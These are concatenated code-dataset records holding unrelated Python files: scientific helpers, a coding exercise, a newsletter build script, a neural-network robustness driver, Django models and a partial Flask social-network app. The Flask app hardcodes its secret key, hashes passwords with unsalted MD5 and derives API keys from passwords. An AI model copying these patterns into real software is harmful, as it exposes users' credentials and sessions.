Area [a.u.]')\n ax.set_title(title)\n\n\ndef gm_3D_trajectory(n):\n \"\"\"\n 3D Golden means trajectory as proposed by Chan et al.\n\n Input:\n n: Number of spokes\n \"\"\"\n # Find the eigen values in equation [5]\n A = np.array([[0, 1, 0],\n [0, 0, 1],\n [1, 0, 1]])\n w, v = np.linalg.eig(A)\n ea = np.real(v[:, 0])\n # Normalise the eigen vector\n ea /= max(ea)\n v1 = ea[0]\n v2 = ea[1]\n print(\"v1: {}, v2: {}\".format(v1, v2))\n m = np.arange(n)\n phi = 2*np.pi*m*v2\n theta = np.arccos(np.mod(m*v1, 1))\n\n traj = np.zeros((n, 3))\n traj[:, 0] = np.cos(phi)*np.sin(theta)\n traj[:, 1] = np.sin(phi)*np.sin(theta)\n traj[:, 2] = np.cos(theta)\n\n return traj\n","repo_name":"emilljungberg/merlin_mrm","sub_path":"notebooks/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24936379286","text":"from collections import deque\n# kesinlikle reduce cozumune de bak\n\noperations = {\"+\": lambda a, b: a + b,\n \"-\": lambda a, b: a - b,\n \"*\": lambda a, b: a * b,\n \"/\": lambda a, b: a // b}\n\ncollection = deque(input().split(\" \"))\nnum_lst = deque() # yeni liste yapmadi item = 0 dedi\n\nresult = 0\nwhile collection: # while item < len(collections[item)\n current_item = collection.popleft() # element = collection[item] # gerisi karisik gerekli mi emin degilim 19.30'da cozum\n\n if current_item not in \"*+-/\":\n num_lst.append(int(current_item))\n else:\n operator = current_item\n item_1 = num_lst.popleft()\n\n while num_lst:\n item_2 = num_lst.popleft()\n item_1 = operations[operator](item_1, item_2)\n\n num_lst.appendleft(item_1)\n\nprint(num_lst.pop())\n","repo_name":"Polishko/SoftUni","sub_path":"Python Advanced Exercises/Stacks, Queues, Tuples and Sets/express_alt_1.py","file_name":"express_alt_1.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1327422234","text":"import os\nimport httpx\nimport re\nimport urllib.parse\nimport datetime\n\ndef fetch_ci_time(filePath):\n entries = httpx.get(\"https://api.github.com/repos/tw93/weekly/commits?path=\" + filePath + \"&page=1&per_page=1\")\n ciTime= entries.json()[0][\"commit\"][\"committer\"][\"date\"].split(\"T\")[0]\n return ciTime\n # return datetime.datetime.strptime(ciTime,\"%Y-%m-%d\")\n\nif __name__ == \"__main__\":\n readmefile=open('README.md','w')\n readmefile.write(\"# 潮流周刊\\n\\n> 记录工程师 Tw93 的不枯燥生活,欢迎订阅,也欢迎 [推荐](https://github.com/tw93/weekly/discussions/22) 你的好东西,Fork 自用可见 [开发文档](https://github.com/tw93/weekly/blob/main/Deploy.md),期待你玩得开心~\\n\\n\")\n recentfile=open('RECENT.md','w')\n\n for root, dirs, filenames in os.walk('./src/pages/posts'):\n filenames = sorted(filenames, key=lambda x:float(re.findall(\"(\\d+)\",x)[0]), reverse=True)\n\n for index, name in enumerate(filenames):\n if name.endswith('.md'):\n filepath = urllib.parse.quote(name)\n oldTitle = name.split('.md')[0]\n url = 'https://weekly.tw93.fun/posts/' + oldTitle\n title = '第 ' + oldTitle.split('-')[0] + ' 期 - ' + oldTitle.split('-')[1]\n readmeMd= '* [{}]({})\\n'.format(title, url)\n dateList = [\"2022-10-10\",\"2022-09-26\",\"2022-09-12\",\"2022-09-05\",\"2022-08-29\"]\n num = int(oldTitle.split('-')[0])\n if index < 5 :\n if num < 100 :\n modified = dateList[99-num]\n else :\n modified = fetch_ci_time('/src/pages/posts/' + filepath)\n\n recentMd= '* [{}]({}) - {}\\n'.format(title, url, modified)\n 
recentfile.write(recentMd)\n readmefile.write(readmeMd)\n\n recentfile.close()\n readmefile.close()\n","repo_name":"tw93/weekly","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":441,"dataset":"github-code","pt":"53"} +{"seq_id":"70054562407","text":"\"\"\"\nCalculates the homogeneity of stories as the pairwise cosine similarity of the\nvectors corresponding to the top 5 characters, saving the results to a .tsv\nfile.\n\n@author: Hardik\n\"\"\"\n\nimport argparse\nimport csv\nimport itertools as it\nimport logging\nimport numpy as np\nimport os\nimport sys\nsys.path.insert(1, os.path.join(sys.path[0], os.path.join('..', 'src')))\n\nfrom nltk.corpus import stopwords\nfrom scipy.spatial.distance import cosine\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.preprocessing import normalize\n\nfrom aliases import AliasesManager\nfrom collocates import CollocatesManager\nfrom corpus import CorpusManager\nfrom ranks import RANK_GROUPS\n\n\n# Configure logging\nlogging.basicConfig(format=\"%(levelname)s: [%(asctime)s] %(message)s\",\n\tlevel=logging.INFO)\n\n\nSTOPWORDS = stopwords.words('english')\n\n\ndef main():\n\tparser_description = (\"Calculates the homogeneity of stories as the \"\n\t\t\"pairwise cosine similarity of the vectors corresponding to the top 5 \"\n\t\t\"characters, saving the results to a .tsv file.\")\n\tparser = argparse.ArgumentParser(description=parser_description)\n\n\tparser.add_argument('out_path', help=\"Path to output .tsv file\")\n\t\n\targs = parser.parse_args()\n\n\taliases_manager = AliasesManager()\n\tcollocates_manager = CollocatesManager()\n\tcorpus_manager = CorpusManager()\n\t\n\t# Story Id's\n\tsids = corpus_manager.get_ids(origin='gen')\n\t\n\twith open(args.out_path, 'wb') as f:\n\t\twriter = csv.writer(f, delimiter='\\t', quotechar='\"')\n\n\t\t# Write header.\n\t\twriter.writerow(['STORY ID', 'HOMOGENEITY'])\n\n\t\tfor sid in sids:\n\t\t\tif not aliases_manager.saved(sid, tpe='character') or \\\n\t\t\t\tnot collocates_manager.saved(sid, tpe='character'):\n\t\t\t\tlogging.info(\"Skipping %s...\" % sid)\n\t\t\t\tcontinue\n\n\t\t\tlogging.info(\"For %s\" % sid)\n\n\t\t\ttry:\n\t\t\t\tcollocates = collocates_manager.get(sid, tpe='character',\n\t\t\t\t\tranks=range(1, 6))\n\n\t\t\t\tkeyfunc = lambda c: c['alias']['entity']['rank']\n\t\t\t\tcollocates = sorted(collocates, key=keyfunc)\n\t\t\t\t\n\t\t\t\tgrouped_collocates = {r: list(cs) for r, cs\n\t\t\t\t\tin it.groupby(collocates, key=keyfunc)}\n\n\t\t\t\tcount_vect = CountVectorizer(stop_words=STOPWORDS)\n\t\t\t\tcount_vect.fit([' '.join([c['token']['lemma'] for c in cs])\n\t\t\t\t\tfor _, cs in grouped_collocates.iteritems()])\n\n\t\t\t\tvecs = []\n\t\t\t\tfor rank, colls in grouped_collocates.iteritems():\n\t\t\t\t\tvec = count_vect.transform([' '.join([coll['token']['lemma']\n\t\t\t\t\t\tfor coll in colls])]).astype(float)\n\t\t\t\t\tvecs.append(normalize(vec).todense())\n\n\t\t\t\tpairwise_sims = [1 - cosine(vec1, vec2) for vec1, vec2\n\t\t\t\t\tin it.combinations(vecs, 2)]\n\t\t\t\t\t\n\t\t\t\twriter.writerow([sid, np.mean(pairwise_sims)])\n\t\t\texcept (IndexError, ValueError):\n\t\t\t\tlogging.info(\"Skipping %s\" % sid)\n\n\nif __name__ == 
'__main__':\n\tmain()\n","repo_name":"rbudac/McGill-Characterization-Process","sub_path":"scripts/calc_homogeneity.py","file_name":"calc_homogeneity.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"20511853835","text":"import itertools\nimport json\nimport os\nimport matlab.engine\nimport imageio # MUST APPEAR *AFTER* \"import matlab.engine\" or nasty error messages will occur\nimport nbformat\nimport numpy\nfrom pathlib import Path\nimport re\nimport subprocess\nimport RobustnessKeys\nfrom SourceReplacePreprocessor import SourceReplacePreprocessor\nfrom TagRunPreprocessor import TagRunPreprocessor\nimport TemplateManager\n\n\nclass ComputeRobustness:\n\n training_data_directory_name = \"TrainingData\"\n\n stats_file_name = \"stats.json\"\n\n sum_key = \"sum\"\n sum_squared_key = \"sum_squared\"\n total_pixels_key = \"total_pixels\"\n\n results_json_file_name = \"results.json\"\n\n alc_home_env_var_name = \"ALC_HOME\"\n\n def __init__(self, template_parameters_file):\n self.template_parameters_file_path = Path(template_parameters_file)\n\n @staticmethod\n def check_value(num_channels, value):\n retval = value\n\n if num_channels == 3:\n if isinstance(value, list):\n if len(value) == 1:\n retval = value * 3\n elif len(value) != 3:\n retval = None\n else:\n retval = [value] * 3\n\n return retval\n\n @staticmethod\n def check_mean_std(eng, image, mean, std):\n num_channels = eng.size(image, 3)\n\n return_mean = ComputeRobustness.check_value(num_channels, mean)\n if return_mean is None:\n raise RuntimeError(\"Please specify a valid mean\")\n\n return_std = ComputeRobustness.check_value(num_channels, std)\n if return_std is None:\n raise RuntimeError(\"Please specify a valid std\")\n\n return return_mean, return_std\n\n def compute_and_create_notebook(self):\n\n with self.template_parameters_file_path.open(\"r\") as template_parameters_fp:\n template_parameter_map = json.load(template_parameters_fp)\n\n #\n # GET DATASET SCRIPT FOR EXTRACTING TRAINING/TESTING DATA IMAGES, CATEGORY NAMES, CATEGORY VALUES\n #\n lec_dataset_script_text = template_parameter_map[RobustnessKeys.template_dataset_key]\n\n match = re.search(r\"class\\s*(\\w+)\", lec_dataset_script_text)\n class_name = match.group(1)\n exec(lec_dataset_script_text, globals())\n clazz = globals().get(class_name)\n\n #\n # GET CATEGORY DICT FROM TRAINING DATA\n #\n\n lec_directory = template_parameter_map[RobustnessKeys.template_lec_parent_directory_path_key]\n training_data_directory_path = Path(lec_directory, ComputeRobustness.training_data_directory_name)\n category_dict = clazz(training_data_directory_path).get_category_dict()\n\n #\n # GET STATS FOR CALCULATING MEAN, STD\n #\n stats_file_path = Path(training_data_directory_path, ComputeRobustness.stats_file_name)\n if stats_file_path.is_file():\n with stats_file_path.open(\"r\") as stats_fp:\n stats_json = json.load(stats_fp)\n sum_intensity = stats_json[ComputeRobustness.sum_key]\n if isinstance(sum_intensity, list):\n sum_intensity = numpy.asarray(sum_intensity)\n sum_intensity_squared = stats_json[ComputeRobustness.sum_squared_key]\n if isinstance(sum_intensity_squared, list):\n sum_intensity_squared = numpy.asarray(sum_intensity_squared)\n total_pixels = stats_json[ComputeRobustness.total_pixels_key]\n else:\n png_chain = itertools.chain(\n # *png_iteratable_list,\n training_data_directory_path.glob(\"**/*.png\")\n )\n\n intensity_initialized = False\n 
sum_intensity = None\n sum_intensity_squared = None\n total_pixels = 0\n for training_file in png_chain:\n image = imageio.imread(training_file)\n shape = image.shape\n if len(shape) == 2:\n image = numpy.expand_dims(image, axis=2)\n shape = image.shape\n total_pixels += shape[0] * shape[1]\n num_channels = shape[2]\n\n if not intensity_initialized:\n intensity_initialized = True\n sum_intensity = numpy.asarray([0] * num_channels)\n sum_intensity_squared = numpy.asarray([0] * num_channels)\n\n for channel in range(0, num_channels):\n norm_channel = image[:, :, channel] / 255.0\n sum_intensity[channel] += norm_channel.sum()\n sum_intensity_squared[channel] += numpy.square(norm_channel).sum()\n\n stats_json = {\n ComputeRobustness.sum_key: sum_intensity.tolist(),\n ComputeRobustness.sum_squared_key: sum_intensity_squared.tolist(),\n ComputeRobustness.total_pixels_key: total_pixels\n }\n with stats_file_path.open(\"w\") as stats_fp:\n json.dump(stats_json, stats_fp, indent=4, sort_keys=True)\n\n #\n # CALCULATE MEAN, STD\n #\n mean = sum_intensity / total_pixels\n variance = sum_intensity_squared / total_pixels - numpy.square(mean)\n std = numpy.sqrt(variance)\n\n mean_list = mean.tolist()\n std_list = std.tolist()\n\n template_parameter_map[RobustnessKeys.template_mean_key] = mean_list\n template_parameter_map[RobustnessKeys.template_standard_deviation_key] = std_list\n\n # START MATLAB ENGINE\n eng = matlab.engine.start_matlab()\n\n # ADD PATHS OF NEEDED FUNCTIONS TO MATLAB ENVIRONMENT\n matlab_function_path_list = []\n\n local_matlab_function_dir = str(Path(Path(__file__).absolute().parent, \"matlab\"))\n matlab_function_path_list.append(local_matlab_function_dir)\n\n alc_home_path = Path(os.environ[ComputeRobustness.alc_home_env_var_name])\n\n nnv_code_dir = str(Path(alc_home_path, \"verivital\", \"nnv\", \"code\", \"nnv\"))\n matlab_function_path_list.append(nnv_code_dir)\n\n nnv_engine_util_dir = str(Path(nnv_code_dir, \"engine\", \"utils\"))\n matlab_function_path_list.append(nnv_engine_util_dir)\n\n #\n # EXECUTE MATLAB ENGINE\n #\n eng.addpath(*matlab_function_path_list)\n eng.cd(nnv_code_dir)\n eng.startup_nnv(nargout=0)\n\n # LOAD NETWORK\n mat_file_name = template_parameter_map[RobustnessKeys.template_lec_file_name_key]\n network_directory = template_parameter_map[RobustnessKeys.template_lec_directory_path_key]\n network_directory_path = Path(network_directory)\n mat_file = Path(network_directory_path, mat_file_name)\n\n net = eng.load(str(mat_file))\n net = eng.struct2cell(net)[0]\n # eng.workspace['net'] = net\n layers = eng.getfield(net, 'Layers')\n output_size = len(eng.getfield(layers[-1], 'Bias'))\n eng.setfield(net, 'OutputSize', output_size)\n\n # GET NUMBER OF CORES\n c = eng.parcluster('local')\n num_cores = eng.get(c).get('NumWorkers') # specify number of cores used for verification\n\n parameter_map = template_parameter_map[RobustnessKeys.template_parameter_map_key]\n\n reach_method = parameter_map[RobustnessKeys.method_parameter_key]\n\n #\n # GET NAMES OF ALL REQUIRED PARAMETERS\n #\n attack_type = parameter_map[RobustnessKeys.attack_parameter_key]\n extra_parameter_set = RobustnessKeys.attack_map \\\n .get(attack_type) \\\n .get(RobustnessKeys.required_parameters_key)\n\n perturbation_function_name = RobustnessKeys.attack_map\\\n .get(attack_type) \\\n .get(RobustnessKeys.perturbation_function_name_key)\n perturbation_function = getattr(eng, perturbation_function_name)\n\n structure_data_map = {name: parameter_map[name] for name in extra_parameter_set}\n 
per_image_function = perturbation_function(structure_data_map)\n\n #\n # CREATE TEST-DATA CSV FILE\n #\n test_data_directory_list = template_parameter_map[RobustnessKeys.template_test_data_directory_list_key]\n success_table = []\n test_data_object = clazz(test_data_directory_list, category_map=category_dict)\n for image_file, category_name, category_number in test_data_object:\n im_target = matlab.double([category_number])\n\n image = eng.imread(str(image_file))\n image = matlab.double(image)\n\n mod_mean, mod_std = ComputeRobustness.check_mean_std(eng, image, mean_list, std_list)\n mean_for_image = matlab.double(mod_mean)\n std_for_image = matlab.double(mod_std)\n\n input_set_star = eng.getImageStar(image, per_image_function, mean_for_image, std_for_image)\n\n # net.verifyRobustness(input_net_star, im_target, reach_method, num_cores)\n r_nn = eng.verifyRobustness(net, input_set_star, im_target, reach_method, num_cores)\n\n success_table.append({\n RobustnessKeys.image_path_key: str(image_file),\n RobustnessKeys.category_name_key: category_name,\n RobustnessKeys.category_number_key: category_number,\n RobustnessKeys.result_key: r_nn\n })\n\n eng.exit()\n\n template_parameter_map[RobustnessKeys.template_results_file_name_key] = \\\n ComputeRobustness.results_json_file_name\n\n template = TemplateManager.image_perturbation_python_notebook_template\n\n notebook_string = template.render(**template_parameter_map)\n\n specific_notebook_directory_path = Path(\n template_parameter_map[RobustnessKeys.template_specific_notebook_directory_key]\n )\n specific_notebook_directory_path.mkdir(parents=True, exist_ok=True)\n\n notebook_path = Path(specific_notebook_directory_path, \"robustness.ipynb\")\n\n results_json_file_path = Path(specific_notebook_directory_path, ComputeRobustness.results_json_file_name)\n with results_json_file_path.open(\"w\") as results_fp:\n json.dump(success_table, results_fp, indent=4, sort_keys=True)\n\n tag_run_preprocessor = TagRunPreprocessor(timeout=1800, kernel_name='python3')\n tag_run_preprocessor.execute_cell_tags = (\"execute_cell\",)\n\n source_replace_preprocessor = SourceReplacePreprocessor()\n source_replace_preprocessor.source_replace_tags = (\"source_replace\",)\n source_replace_preprocessor.regex_substitution_list = [\n (\"AUTORUN ALL CELLS\", \"# Cells below should be executed automatically\", True)\n ]\n\n nb = nbformat.reads(notebook_string, as_version=4)\n\n try:\n (nb, resources) = tag_run_preprocessor.preprocess(\n nb, {'metadata': {'path': str(notebook_path.parent.absolute())}}\n )\n source_replace_preprocessor.preprocess(nb, {})\n except:\n pass\n\n with notebook_path.open(\"w\", encoding='utf-8') as notebook_fp:\n nbformat.write(nb, notebook_fp)\n\n subprocess.run([\"jupyter\", \"trust\", str(notebook_path)])\n notebook_path.chmod(0o444)\n\n #\n # WRITE PATH TO NOTEBOOK HERE\n #\n\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser(description=\"Specify json file from which to read program parameters\")\n parser.add_argument(\"json_file\")\n args = parser.parse_args()\n json_file = args.json_file\n compute_robustness = ComputeRobustness(json_file)\n compute_robustness.compute_and_create_notebook()\n","repo_name":"AbLECPS/alc","sub_path":"webgme/ALC-Dev/src/plugins/LaunchVerification/LaunchVerification/ComputeRobustness.py","file_name":"ComputeRobustness.py","file_ext":"py","file_size_in_byte":11545,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} 
+{"seq_id":"43355013838","text":"from django.db import models\nfrom django.utils.translation import gettext as _\n\nclass Product(models.Model):\n title = models.CharField(_(\"title\"), max_length=200)\n price = models.IntegerField(_(\"price\"),)\n discount = models.FloatField(_(\"discount\"))\n special_discount = models.FloatField(_(\"special_discount\"))\n special_discount_time = models.DateTimeField(_(\"special_discount_time\"), auto_now=True, auto_now_add=False)\n number = models.IntegerField(_(\"number\"))\n description = models.TextField(_(\"description\"))\n image = models.FileField(_(\"image\"), blank=True)\n\n\nclass ProductImage(models.Model):\n product = models.ForeignKey(Product, default=None, on_delete=models.CASCADE)\n images = models.FileField(upload_to = 'images/')\n \nclass SlidBar(models.Model):\n title = models.CharField(_(\"title\"), max_length=300)\n header = models.CharField(_(\"header\"), max_length=300, blank=True)\n description = models.TextField(_(\"description\"), blank=True)\n image = models.ImageField(_(\"image\"), upload_to=\"slidbar/\")\n product_id = models.IntegerField(_(\"product id\"), blank=True, default=0)\n is_active = models.BooleanField(_(\"show on website\"))\n \n\n class Meta:\n verbose_name = _(\"slider\")\n verbose_name_plural = _(\"sliders\")\n\n def __str__(self):\n return self.title\n\n \n","repo_name":"pouyasalimian/online-store","sub_path":"my-site/product/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29269904772","text":"from datetime import datetime\r\nfrom flask import Flask, request, session, redirect, render_template, url_for, \\\r\n send_file\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom flask_wtf import FlaskForm\r\nfrom flask_wtf.file import FileField\r\nfrom functools import wraps\r\nfrom wtforms import StringField, PasswordField, SubmitField, \\\r\n TextAreaField\r\nfrom wtforms.fields.html5 import DateField\r\nimport hashlib\r\nfrom dateutil import parser\r\nfrom wtforms.validators import DataRequired, Length\r\nfrom libgravatar import Gravatar\r\nfrom io import BytesIO\r\n\r\napp = Flask(__name__)\r\napp.config['SQLALCHEMY_DATABASE_URI'] = url = 'sqlite:///data.db'\r\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\r\napp.config['SECRET_KEY'] = \"sup3rs3cre1p@ssvv0rd\"\r\ndb = SQLAlchemy(app)\r\n\r\nsort_types = [\"name\", \"id\", \"order_in_db\"]\r\n\r\n\r\nclass LoginForm(FlaskForm):\r\n username = StringField('Логин', validators=[\r\n DataRequired(\"Введите имя пользователя\")])\r\n password = PasswordField('Пароль',\r\n validators=[DataRequired(\"Введите пароль\")])\r\n submit = SubmitField('Войти')\r\n\r\n\r\nclass SettingsForm(FlaskForm):\r\n email = StringField('Почта')\r\n password = PasswordField('Пароль')\r\n name = StringField(\"Имя\", validators=[Length(max=10)])\r\n surname = StringField(\"Фамилия\", validators=[Length(max=25)])\r\n about_me = TextAreaField(\"О себе\", validators=[Length(max=240)])\r\n date = DateField(\"Дата рождения\")\r\n submit = SubmitField(\"Применить\")\r\n\r\n\r\nclass RegisterForm(FlaskForm):\r\n name = StringField(\"Имя\", validators=[DataRequired(\"Введите имя\"),\r\n Length(max=10)])\r\n surname = StringField(\"Фамилия\",\r\n validators=[DataRequired(\"Введите фамилию\"),\r\n Length(max=25)])\r\n about_me = TextAreaField(\"О себе\", validators=[\r\n DataRequired(\"Расскажите о себе (240 символов)\"),\r\n Length(max=240)])\r\n username = 
StringField(\"Логин\", validators=[\r\n DataRequired(\"Введите имя пользователя\"),\r\n Length(max=80)])\r\n date = DateField(\"Дата рождения\")\r\n password = PasswordField('Пароль',\r\n validators=[DataRequired(\"Введите пароль\"),\r\n Length(6)])\r\n retype_password = PasswordField('Повторите Пароль',\r\n validators=[\r\n DataRequired(\"Введите пароль ещё раз\")])\r\n email = StringField(\"Почта\", validators=[DataRequired(\"Введите Email\"),\r\n Length(max=120)])\r\n submit = SubmitField(\"Регистрация\")\r\n\r\n\r\nclass ArticleForm(FlaskForm):\r\n title = StringField(\"Название\",\r\n validators=[DataRequired(\"Введите название!\"),\r\n Length(max=64)])\r\n content = TextAreaField(\"Текст статьи\",\r\n validators=[DataRequired(\"Введите текст!\"),\r\n Length(max=4096)])\r\n file = FileField(\"Дополнительные файлы\")\r\n submit = SubmitField(\"Отправить\")\r\n\r\n\r\nclass User(db.Model):\r\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\r\n username = db.Column(db.String(80), unique=True, nullable=False)\r\n name = db.Column(db.String(10), unique=False, nullable=False)\r\n surname = db.Column(db.String(25), unique=False, nullable=False)\r\n email = db.Column(db.String(120), unique=True, nullable=False)\r\n about_me = db.Column(db.String(240), nullable=True)\r\n password_hash = db.Column(db.String(128), unique=False, nullable=False)\r\n avatar_path = db.Column(db.String(400), nullable=True, unique=False)\r\n api_key = db.Column(db.String(35), unique=True, nullable=False)\r\n date = db.Column(db.Date(), unique=False,\r\n nullable=False)\r\n is_beta = db.Column(db.Boolean, unique=False, default=False)\r\n is_admin = db.Column(db.Boolean, unique=False, default=False)\r\n articles = db.relationship('Article',\r\n backref=db.backref('Author',\r\n lazy=True))\r\n\r\n def __repr__(self):\r\n return ''.format(\r\n self.id, self.username, self.name, self.surname)\r\n\r\n\r\nclass Relations(db.Model):\r\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\r\n friend_from = db.Column(db.Integer)\r\n friend_to = db.Column(db.Integer)\r\n\r\n\r\nclass Article(db.Model):\r\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\r\n user_id = db.Column(db.Integer, db.ForeignKey('user.id'))\r\n title = db.Column(db.String(64), unique=False, nullable=True)\r\n content = db.Column(db.String(4096), unique=False, nullable=False)\r\n timestamp = db.Column(db.DateTime, index=True, default=datetime.utcnow)\r\n is_with_files = db.Column(db.Boolean, nullable=False)\r\n files = db.relationship(\"FileInArticle\", backref=\"Files\", lazy=True)\r\n\r\n def __repr__(self):\r\n return '
'.format(\r\n self.id, self.user_id, self.timestamp)\r\n\r\n\r\nclass FileInArticle(db.Model):\r\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\r\n name = db.Column(db.String(4096), nullable=False)\r\n article_id = db.Column(db.Integer, db.ForeignKey('article.id'))\r\n file = db.Column(db.LargeBinary, nullable=False)\r\n\r\n\r\nclass Message(db.Model):\r\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\r\n text = db.Column(db.String(4096), nullable=False)\r\n from_user_id = db.Column(db.Integer, nullable=False)\r\n to_user_id = db.Column(db.Integer, nullable=False)\r\n\r\n def __repr__(self):\r\n return ''.format(\r\n self.id, self.from_user_id, self.to_user_id)\r\n\r\n\r\ndef login_required(f):\r\n @wraps(f)\r\n def decorated_function(*args, **kwargs):\r\n if session.get(\"username\") is None:\r\n return redirect(url_for('login', next=request.url))\r\n return f(*args, **kwargs)\r\n\r\n return decorated_function\r\n\r\n\r\ndef do_magic(ident, t):\r\n if request.form['api_key'] != session.get('api_key'):\r\n pass\r\n else:\r\n sender = User.query.filter_by(\r\n id=session.get('id')).first()\r\n user = User.query.filter_by(id=ident).first()\r\n rel = Relations.query.filter_by(friend_from=sender.id,\r\n friend_to=user.id)\r\n if t == \"ad\":\r\n if user.id != sender.id and not rel.first():\r\n rel = Relations(friend_from=sender.id, friend_to=user.id)\r\n db.session.add(rel)\r\n db.session.commit()\r\n elif t == \"rm\":\r\n if user.id != sender.id and rel.first():\r\n rel.delete()\r\n db.session.commit()\r\n\r\n\r\n@app.route(\"/chat/id\", methods=['GET', 'POST'])\r\n@login_required\r\ndef chat(ident):\r\n user = User.query.filter_by(id=session.get(\"id\")).first()\r\n to_user = User.query.filter_by(id=ident).first()\r\n if not to_user:\r\n return redirect(\"/404\")\r\n if request.method == \"POST\":\r\n if request.form.get(\"message_text\"):\r\n msg = Message(text=request.form.get(\"message_text\"),\r\n from_user_id=session.get(\"id\"), to_user_id=ident)\r\n db.session.add(msg)\r\n db.session.commit()\r\n messages = list(\r\n reversed(sorted(Message.query.filter_by(from_user_id=user.id,\r\n to_user_id=to_user.id)\r\n .all() +\r\n Message.query.filter_by(\r\n from_user_id=to_user.id,\r\n to_user_id=user.id).all(),\r\n key=lambda x: -x.id)[:100]))\r\n users = {user.id: user,\r\n to_user.id: to_user}\r\n return render_template(\"chat.html\", ident=ident, messages=messages,\r\n users=users)\r\n\r\n\r\n@app.route(\"/\", methods=['POST', 'GET'])\r\n@app.route(\"/feed\", methods=['POST', 'GET'])\r\n@login_required\r\ndef index():\r\n articles = list(reversed(\r\n sorted(\r\n [Article.query.filter_by(user_id=i.friend_to).all()[:-5:-1] for i in\r\n Relations.query.filter_by(\r\n friend_from=session.get(\"id\")).all()])))[:20]\r\n try:\r\n if not articles[0]:\r\n articles = []\r\n else:\r\n articles = [(art, User.query.filter_by(id=art[0].user_id).first())\r\n for\r\n art\r\n in\r\n articles if art]\r\n except Exception as e:\r\n print(e)\r\n articles = []\r\n return render_template(\"feed.html\", articles=articles)\r\n\r\n\r\n@app.route(\"/info\")\r\ndef info():\r\n return render_template(\"info.html\")\r\n\r\n\r\n@app.route(\"/login\", methods=['POST', 'GET'])\r\ndef login():\r\n if session.get(\"username\", None) is not None:\r\n return redirect(\"/feed\")\r\n form = LoginForm()\r\n if request.method == \"POST\":\r\n if form.validate_on_submit():\r\n m = hashlib.md5()\r\n m.update(\r\n request.form['password'].encode(\r\n 'UTF-8'))\r\n user = 
User.query.filter_by(\r\n username=request.form['username']).first()\r\n if user and user.password_hash == m.hexdigest():\r\n session['id'] = user.id\r\n session['username'] = user.username\r\n session['api_key'] = user.api_key\r\n session['is_admin'] = user.is_admin\r\n return redirect(\"/feed\")\r\n else:\r\n form.username.errors.append(\r\n \"Пользователь с парой Логин+Пароль не найден!\")\r\n return render_template(\"login.html\", session=session, form=form)\r\n\r\n\r\n@app.route(\"/register\", methods=['POST', 'GET'])\r\ndef register():\r\n if session.get(\"username\", None) is not None:\r\n return redirect(\"/feed\")\r\n form = RegisterForm()\r\n if request.method == \"POST\":\r\n if form.validate_on_submit():\r\n if request.form['password'] != request.form['retype_password']:\r\n form.password.errors.append(\"Пароли не совпадают!\")\r\n elif \" \" in request.form[\"username\"]:\r\n form.username.errors.append(\"В логине не должно быть пробелов!\")\r\n elif \"@\" not in request.form[\"email\"]:\r\n form.email.errors.append(\"Введите реальную почту!\")\r\n elif User.query.filter_by(\r\n username=request.form['username']).first() is not None:\r\n form.username.errors.append(\"Уже зарегестрирован!\")\r\n else:\r\n try:\r\n m = hashlib.md5()\r\n m.update(\r\n (request.form['password']).encode(\r\n 'UTF-8'))\r\n m1 = hashlib.md5()\r\n m1.update((request.form['username'] + request.form[\r\n \"password\"][\r\n 2:5]).encode(\"UTF-8\"))\r\n avatar = Gravatar(request.form['email']).get_image(248)\r\n new_user = User(username=request.form['username'],\r\n name=request.form['name'],\r\n about_me=request.form['about_me'],\r\n surname=request.form['surname'],\r\n email=request.form['email'],\r\n avatar_path=avatar,\r\n password_hash=m.hexdigest(),\r\n date=parser.parse(request.form['date']),\r\n api_key=m1.hexdigest())\r\n db.session.add(new_user)\r\n db.session.commit()\r\n user = User.query.filter_by(\r\n username=new_user.username).first()\r\n session['id'] = user.id\r\n session['username'] = user.username\r\n session['api_key'] = user.api_key\r\n session['is_admin'] = user.is_admin\r\n return redirect(\"/feed\")\r\n except Exception as e:\r\n print(e)\r\n form.username.errors.append(\r\n \"Ошибка при создании профиля!\")\r\n return render_template(\"register.html\", session=session, form=form)\r\n\r\n\r\n# TODO This thing\r\n@app.route(\"/user/id/settings\", methods=['GET', 'POST'])\r\n@login_required\r\ndef settings(identificator):\r\n if identificator != session.get(\"id\") and not session.get(\"is_admin\"):\r\n return redirect(\"/404\")\r\n else:\r\n user = User.query.filter_by(id=identificator).first()\r\n form = SettingsForm()\r\n if request.method == \"POST\":\r\n if form.validate_on_submit():\r\n if \"@\" not in request.form[\"email\"]:\r\n form.email.errors.append(\"Введите реальную почту!\")\r\n elif request.form.get(\"email\") != \"\":\r\n user.email = request.form[\"email\"]\r\n user.avatar_path = Gravatar(request.form['email']) \\\r\n .get_image(248)\r\n if request.form.get(\"password\") != \"\":\r\n m = hashlib.md5()\r\n m.update(\r\n (request.form[\"password\"]).encode(\r\n 'UTF-8'))\r\n user.password_hash = m.hexdigest()\r\n if request.form.get(\"name\") != \"\":\r\n user.name = request.form[\"name\"]\r\n if request.form.get(\"surname\") != \"\":\r\n user.surname = request.form[\"surname\"]\r\n if request.form.get(\"about_me\") != \"\":\r\n user.about_me = request.form[\"about_me\"]\r\n if request.form.get(\"date\") != \"\":\r\n user.date = parser.parse(request.form['date'])\r\n 
